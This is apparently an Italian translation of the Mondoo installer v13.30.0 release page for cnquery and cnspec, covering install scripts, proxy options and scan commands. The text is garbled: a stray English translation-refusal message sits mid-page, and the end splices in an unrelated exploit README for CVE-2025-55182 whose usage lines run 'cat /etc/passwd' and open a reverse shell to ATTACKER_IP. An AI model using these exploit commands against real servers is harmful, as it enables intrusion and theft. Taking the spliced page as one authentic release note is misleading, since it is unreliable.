Torna agli aggiornamenti
New releaseJul 21, 2026

installer v13.30.0

Script di installazione per Linux, macOS e Windows per cnquery & cnspec

Condividi

Panoramica

Stato

  • Docker Containers: Release Test: Docker Containers
  • Homebrew: Release Test: Homebrew
  • Install.sh: Release Test: install.sh
  • Install.ps1: Release Test: install.ps1
  • macOS Pkg: Release Test: macOS Package
  • Arch Linux: Release Test: Arch Linux

Installazione

Il modo più semplice per installare mql e cnspec è utilizzare gli script di installazione.

tramite Shell Script (Linux e macOS)

https://install.mondoo.com/sh```bash bash -c "$(curl -sSL https://install.mondoo.com/sh)"

### via PowerShell (Windows)

[`https://install.mondoo.com/ps1`](https://install.mondoo.com/ps1)```powershell
Set-ExecutionPolicy Unrestricted -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
iex ((New-Object System.Net.WebClient).DownloadString('https://install.mondoo.com/ps1'));
Install-Mondoo;

Dietro un proxy HTTP

Passa il proxy allo script di installazione con -x (Linux e macOS) o -Proxy (Windows). Lo script indirizza attraverso di esso i propri download, l'installazione dei pacchetti, cnspec login e l'aggiornamento automatico. Il download iniziale dello script avviene prima che il flag venga letto, quindi indirizza anche quello verso il proxy:```bash export https_proxy='http://proxy.example.com:3128' curl -sSL --proxy "$https_proxy" https://install.mondoo.com/sh | bash -s -- -x "$https_proxy"

I'm sorry, but I don't see any content to translate in your message. You mentioned "INPUT:" but no actual Markdown text was provided after it.

Please paste the chunk 7 content you'd like me to translate from English to Italian, and I'll return only the translated Markdown, preserving all structure, code, paths, URLs, and technical identifiers exactly as they appear.```powershell
Set-ExecutionPolicy Unrestricted -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
$wc = New-Object System.Net.WebClient;
$wc.Proxy = New-Object System.Net.WebProxy('http://proxy.example.com:3128');
iex ($wc.DownloadString('https://install.mondoo.com/ps1'));
Install-Mondoo -Proxy 'http://proxy.example.com:3128';

Su Linux e macOS un https_proxy o http_proxy ereditato viene rilevato automaticamente quando -x non è specificato. In entrambi i casi vengono esportate entrambe le forme, quindi anche i repository della distribuzione — che su Debian e Ubuntu sono in semplice HTTP — vengono raggiunti attraverso il proxy. Qualsiasi no_proxy tu abbia impostato viene mantenuto invariato, anche attraverso sudo.

L'URL del proxy deve essere un URL semplice: se contiene credenziali, codificale in percentuale (! come %21, e così via). Il valore viene scritto nel job pianificato dell'auto aggiornatore, quindi i caratteri che richiederebbero l'uso di virgolette in quel contesto vengono rifiutati anziché sottoposti a escape.

Scansiona la tua piattaforma di destinazione

Scansiona la tua piattaforma di destinazione:```bash

query system information with incident and inventory query pack

mql scan aws

scan the platform for security vulnerabilities

cnspec scan aws

Registrati per un account Mondoo per accedere a più policy e archiviare i report. Per saperne di più, [contattaci](https://mondoo.com/contact).```bash
cnspec login -t 'eyJh...llZ4BW'

mql e cnspec supportano target locali e remoti, inclusi server (Linux, Windows, macOS), Cloud (AWS, Azure, Google, VMware), Kubernetes (EKS, GKE, AKS, self-managed), container, registry di container, prodotti SaaS (Google Workspace, M365, GitHub, GitLab) e altro ancora.

Esegui una scansione:```bash

scan your local host

cnspec scan local

scan a cloud environment

cnspec scan aws cnspec scan gcp cnspec scan azure

scan a kubernetes cluster

cnspec scan k8s

scan a docker image from a remote registry

cnspec scan docker image debian:12

scan a docker container (get ids from docker ps)

cnspec scan docker container 00fa961d6b6a

scan a system over ssh

cnspec scan ssh [email protected]

## Informazioni sul pacchetto

`https://install.mondoo.com/package/cnspec/{platform}/{arch}/{filetype}/{version}/{method}`

Gli argomenti supportano i seguenti valori:

| Argomento  | Valori                                               |
| ---------- | ---------------------------------------------------- |
| `platform` | `linux`, `windows`, `darwin`                         |
| `arch`     | `amd64`, `arm64`, `armv7`, `armv6`, `386`, `ppc64le` |
| `filetype` | `tar.gz`, `deb`, `rpm`, `zip`, `pkg`, `msi`          |
| `version`  | `latest` o un numero specifico                       |
| `method`   | `download`, `filename`, `version`, `sha256`          |```bash
# Download the latest version
https://install.mondoo.com/package/cnspec/linux/arm64/rpm/latest/download

Utilizzo

python3 CVE-2025-55182.py -u <url> -c <command>

Esempi

# Esegui il comando id
python3 CVE-2025-55182.py -u http://target.com -c "id"

# Leggi un file
python3 CVE-2025-55182.py -u http://target.com -c "cat /etc/passwd"

# Reverse shell
python3 CVE-2025-55182.py -u http://target.com -c "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"

Rilevamento

Per verificare se un server è vulnerabile senza eseguire comandi:

python3 CVE-2025-55182.py -u http://target.com --check

Mitigazione

  1. Aggiorna React: passa a React 19.2.1 o versione successiva
  2. Aggiorna Next.js: passa a Next.js 15.0.5 o versione successiva
  3. WAF: distribuisci regole WAF per bloccare payload sospetti
  4. Monitoraggio: monitora i log del server per attività sospette

Riferimenti

Licenza

Questo progetto è fornito solo a scopo didattico e di ricerca sulla sicurezza. Gli autori non sono responsabili per qualsiasi uso improprio.

Declinazione di responsabilità

Categorie